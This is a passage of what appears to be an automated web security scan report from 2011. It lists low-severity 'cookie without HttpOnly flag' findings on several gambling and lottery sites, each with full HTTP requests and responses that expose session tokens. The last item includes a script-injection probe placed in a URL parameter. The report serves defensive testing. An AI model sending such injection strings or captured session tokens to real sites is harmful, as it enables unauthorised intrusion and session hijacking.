Set-Cookie: ASPSESSIONIDAASDBABS=KDMLJIPDPDOMNHLOJJMHPKKA; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:49 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/


12.69. https://www.betsson.com/en/customer-service/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23563
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=IAMLJIPDMACCCMGFMONHJNKI; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-
...[SNIP]...

12.70. https://www.betsson.com/en/customer-service/forgotten-password/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/forgotten-password/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/forgotten-password/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13183
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=KIEEAKPDAIGMFJDJEJFFOHCB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:39 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...

12.71. https://www.betsson.com/en/customer-service/privacy-statement/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/privacy-statement/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/privacy-statement/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16611
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=EBMLJIPDHIKKMCGJMGGHLPPD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...

12.72. https://www.betsson.com/en/customer-service/responsible-gaming/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/responsible-gaming/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16796
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=JAMLJIPDANILAPALKCAONEIB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:40 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...

12.73. https://www.betsson.com/en/customer-service/terms/index.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/terms/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68223
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=CBMLJIPDBDPNKEECBALHKDED; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...

12.74. https://www.betsson.com/en/my-account/refer-a-friend/index.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 187
Content-Type: text/html; Charset=UTF-8
Location: /en/need-login.asp?redPage=/en/my-account/refer-a-friend/index.asp
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=KLEEAKPDFACFJMDHHKDNNLBO; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:49 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/en/need-login.asp?redPage=/en/my-account/refer-a-friend/index.asp">here</a>.</body>

12.75. https://www.betsson.com/my-account/refer-a-friend/index.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23633
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQDRSDT=FCFEAKPDAANKFEPNPAAALGCD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:09:12 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta htt
...[SNIP]...

12.76. http://www.crazyscratch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.crazyscratch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.crazyscratch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19913
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCATRTADC=LHKLAAGAEPFNOFFJPCFIKOMO; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.77. http://www.egba.eu/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.egba.eu
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.egba.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:50 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2513ddb56c64491c0c3e6dc9a3ce8434; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3679
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="conten
...[SNIP]...

12.78. http://www.lga.org.mt/lga/content.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lga.org.mt
Path:   /lga/content.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lga/content.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 11:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /lga/errorPage.aspx
Set-Cookie: ASP.NET_SessionId=zeeulfufx4tg3fy1qkxjwpnz; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 136

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/lga/errorPage.aspx'>here</a>.</h2>
</body></html>

12.79. http://www.lga.org.mt/lga/home.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lga.org.mt
Path:   /lga/home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lga/home.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=3cjspfm1kdxdaju4khdahw45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <TITLE>Lotteries and Gaming Authority .. 2008 </TITLE>
       <meta content="Lo
...[SNIP]...

12.80. http://www.metacafe.com/fplayer/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

12.81. http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.national-lottery.co.uk
Path:   /player/p/help/scratchcard.ftl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /player/p/help/scratchcard.ftl HTTP/1.1
Host: www.national-lottery.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:12 GMT
Server: national-lottery
Set-Cookie: CAMTRACK=10.250.3.21.1305547932390731; path=/
Last-Modified: Mon, 16 May 2011 12:12:12 GMT
Content-Length: 22431
Set-Cookie: JSESSIONID=0000Ok27qpuCKPMzjQYnoTwhEVk:1470746us; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=60, s-maxage=60, no-cache=set-cookie
Vary: Accept-Encoding
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" comment "ICRAonline EN v2.0" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-GB


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir
...[SNIP]...

12.82. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=51jln3d46i68pj609s4i8oat56; expires=Wed, 08-Jun-2011 16:18:37 GMT; path=/; domain=.opensource.org
Last-Modified: Mon, 16 May 2011 12:32:15 GMT
ETag: "683ef92c05accf8dc3002cfa2d153539"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

12.83. http://www.paysafecard.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.paysafecard.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.paysafecard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 12:32:01 GMT
X-Powered-By: PHP/5.2.12
Set-Cookie: fe_typo_user=f9a814cd38256b643fb5f503c8119f02; path=/
Set-Cookie: PHPSESSID=t8de4gunlo4krakeb1g01vitn1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: psc_country=a%3A9%3A%7Bs%3A9%3A%22ipAddress%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A11%3A%22countryCode%22%3Bs%3A2%3A%22US%22%3Bs%3A11%3A%22countryName%22%3Bs%3A13%3A%22United+States%22%3Bs%3A10%3A%22regionCode%22%3Bs%3A2%3A%2248%22%3Bs%3A10%3A%22regionName%22%3Bs%3A5%3A%22Texas%22%3Bs%3A7%3A%22zipcode%22%3Bs%3A5%3A%2275207%22%3Bs%3A4%3A%22city%22%3Bs%3A6%3A%22Dallas%22%3Bs%3A8%3A%22latitude%22%3Bd%3A32.782501220703125%3Bs%3A9%3A%22longitude%22%3Bd%3A-96.82070159912109375%3B%7D; expires=Tue, 15-May-2012 12:32:02 GMT
Location: us/us-paysafecard/
Content-Length: 0
Content-Type: text/html
Connection: close
Set-Cookie: TSdab043=18196f71d7d188055573ab30d803bd03c93fc654ccfd9f7f4dd119415a5ab5a8a50b03869c5eca85db19f1b52b66441396171faf; Path=/


12.84. http://www.primegaming.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.primegaming.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.primegaming.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Mon, 16 May 2011 12:44:48 GMT
Content-Length: 5253
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQCQTQDD=PLOHBIGAACPHBCCONPKKDOGK; path=/

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>PrimeGaming.com - Leading Gaming Brands Online</title>
<meta name="keywords" content="casino online, poker
...[SNIP]...

12.85. http://www.primegrattage.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.primegrattage.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Content-Length: 27400
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=NDANCHNDBOKGLAFOAPEGFKFJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

12.86. http://www.primescratchcards.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.primescratchcards.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.primescratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29955
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OHLOLGNDBFFPCKPGPEBMNJLJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.87. http://www.primescratchcards.com/index.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: ARC=130137; pscref=; __utma=24585211.1553229019.1305549846.1305549846.1305549846.1; __utmb=24585211.1.10.1305549846; __utmc=24585211; __utmz=24585211.1305549846.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; plstat=0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 30039
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=http%3A%2F%2Fwww%2Eprimescratchcards%2Ecom%2Findex%2Easp%3Fcurr%3DUSD35af5%2527%253balert%28document%2Elocation%29%2F%2Fd13433ff10e%26g%3D3; expires=Thu, 10-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OCCAMGNDCGHEBKEEJCJBDFCH; path=/
Cache-control: private

